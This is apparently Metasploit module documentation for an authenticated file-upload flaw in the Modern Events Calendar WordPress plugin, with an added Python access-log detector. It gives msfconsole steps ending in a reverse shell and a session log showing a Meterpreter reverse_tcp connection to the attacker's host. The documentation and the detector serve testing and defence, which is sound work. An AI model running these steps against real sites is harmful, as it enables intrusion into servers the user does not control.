## Vulnerable Application

### Description

This module allows an attacker with a privileged WordPress account to launch a reverse shell
through an arbitrary file upload vulnerability in the WordPress plugin Modern Events Calendar < 5.16.5.
The plugin does not correctly check the extension of the uploaded file.
By using a `text/csv` content type in the request, it is possible to upload a `.php` payload, as it is not forbidden by the plugin.
Finally, the uploaded payload can be triggered by a request to `/wp-content/uploads/<random_payload_name>.php`.
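
The trigger request described above is visible in web server access logs. The following Python example is added here and is not part of the module or the plugin; it assumes combined-format access logs, uses constructed log lines, and goes beyond the module's case by also matching `.phtml`, `.phar` and `.phpN` files anywhere below `wp-content/uploads/`.

```python
import re
from urllib.parse import unquote

# Combined access-log prefix: ip ident user [time] "METHOD target PROTO" status
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# Script-like file anywhere below wp-content/uploads/, optionally followed by
# PATH_INFO. Unanchored on the left so a non-"/" WordPress base path still matches.
UPLOADED_SCRIPT = re.compile(
    r'/wp-content/uploads/(?:[^/]+/)*[^/]+\.(?:php\d?|phtml|phar)(?:/|$)', re.IGNORECASE
)

def decoded_path(target):
    """Drop the query string and undo %-encoding twice (catches %252e style dots)."""
    path = target.split("?", 1)[0]
    for _ in range(2):
        path = unquote(path)
    return path

def find_upload_execution(lines):
    """Return one finding per request that targets a script under uploads/."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = LOG_LINE.match(line)
        if not match:
            continue  # not an access-log line in the assumed format
        path = decoded_path(match["target"])
        if UPLOADED_SCRIPT.search(path):
            status = int(match["status"])
            # A 2xx answer means the server handled the script: likely execution.
            findings.append({"line": number, "ip": match["ip"], "path": path,
                             "status": status, "served": 200 <= status < 300})
    return findings

# Constructed sample lines (file name and client IP of line 3 reuse the scenario output).
SAMPLE_LOG = [
    '203.0.113.7 - - [12/Jul/2021:14:19:02 +0200] "GET /wp-content/uploads/2021/07/banner.jpg HTTP/1.1" 200 48211',
    '203.0.113.7 - - [12/Jul/2021:14:19:05 +0200] "GET /wp-login.php HTTP/1.1" 200 5120',
    '192.168.1.35 - - [12/Jul/2021:14:20:43 +0200] "GET /wp-content/uploads/wkook.php HTTP/1.1" 200 0',
    '203.0.113.9 - - [12/Jul/2021:14:25:10 +0200] "GET /blog/wp-content/uploads/2021/07/a%2Ephp?c=1 HTTP/1.1" 404 196',
    '203.0.113.9 - - [12/Jul/2021:14:25:11 +0200] "GET /wp-content/uploads/2021/07/notes.php.txt HTTP/1.1" 200 90',
]

if __name__ == "__main__":
    for finding in find_upload_execution(SAMPLE_LOG):
        print(finding)
```

Findings with `served` set deserve priority, since the uploads directory normally holds only static media and should never answer for a script.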

### Installation

You can easily install WordPress with Docker as explained [here](https://upcloud.com/community/tutorials/wordpress-with-docker/).
Then, you can download a vulnerable version of the Modern Events Calendar plugin from [here](https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip)
and install it on your WordPress website through the plugin page: Add New > Upload Plugin > Browse...

## Verification Steps

1. Start `msfconsole`
2. `use exploit/multi/http/wp_plugin_modern_events_calendar_rce`
3. `set USERNAME <admin_username>`
4. `set PASSWORD <admin_password>`
5. `set TARGETURI <base_path_wordpress>` if the base path of the WordPress website is different from `/`
6. `check` to check if the targeted WordPress website is vulnerable
7. `run` the module to exploit the vulnerability and start a reverse shell

## Options

### USERNAME

Set the USERNAME of your admin account.

### PASSWORD

Set the PASSWORD of your admin account.

## Scenarios

This module was successfully tested on Debian 10 with WordPress 5.7.2 and Modern Events Calendar 5.16.2.
See the following output:

```
msf6 > use wp_plugin_modern_events_calendar_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set rhost 192.168.1.12
rhost => 192.168.1.12
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set username admin
username => admin
msf6 exploit(wp_plugin_modern_events_calendar_rce) > set password my_best_password
password => my_best_password
msf6 exploit(wp_plugin_modern_events_calendar_rce) > run

[*] Started reverse TCP handler on 192.168.1.35:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Uploading file 'wkook.php' containing the payload...
[*] Triggering the payload ...
[*] Sending stage (39282 bytes) to 192.168.1.12
[*] Meterpreter session 10 opened (192.168.1.35:4444 -> 192.168.1.12:34400) at 2021-07-12 14:20:43 +0200

meterpreter > getuid
Server username: www-data (33)
meterpreter > sysinfo 
Computer    : 66dd7f594749
OS          : Linux 66dd7f594749 4.19.0-17-amd64 #1 SMP Debian 4.19.194-2 (2021-06-21) x86_64
Meterpreter : php/linux
meterpreter > 
```
